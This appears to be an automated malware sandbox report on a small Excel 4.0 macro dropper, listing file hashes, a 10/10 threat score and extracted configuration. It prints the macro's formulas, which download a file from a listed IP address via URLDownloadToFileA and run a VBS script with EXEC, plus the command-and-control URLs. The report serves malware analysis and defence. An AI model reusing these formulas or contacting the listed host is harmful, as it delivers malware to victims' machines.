General

  • Target

    304c34f71a139a5915827427d257160e

  • Size

    6KB

  • Sample

    231222-adzdksdgam

  • MD5

    304c34f71a139a5915827427d257160e

  • SHA1

    7f70e00be516eac0e20dce5590b2a44682d3b504

  • SHA256

    bb47aa8044fde53ad4eb7843b60055097f844b03a57469802363d6733d195ac1

  • SHA512

    059c9884e109b0462025f38830cdfac8b6ab9b3e2334d2efe885d53627e9abe17fdc8a10184d3e3cce949604633b6ab2a4a7471982c2dd9b11d750b515d05e18

  • SSDEEP

    192:NDS7uSpbrA2OmmfRk8UhHFBFYuyb98yVV+y:NsuGM2w+1FYDb98yVX

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      304c34f71a139a5915827427d257160e

    • Size

      6KB

    • MD5

      304c34f71a139a5915827427d257160e

    • SHA1

      7f70e00be516eac0e20dce5590b2a44682d3b504

    • SHA256

      bb47aa8044fde53ad4eb7843b60055097f844b03a57469802363d6733d195ac1

    • SHA512

      059c9884e109b0462025f38830cdfac8b6ab9b3e2334d2efe885d53627e9abe17fdc8a10184d3e3cce949604633b6ab2a4a7471982c2dd9b11d750b515d05e18

    • SSDEEP

      192:NDS7uSpbrA2OmmfRk8UhHFBFYuyb98yVV+y:NsuGM2w+1FYDb98yVX

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks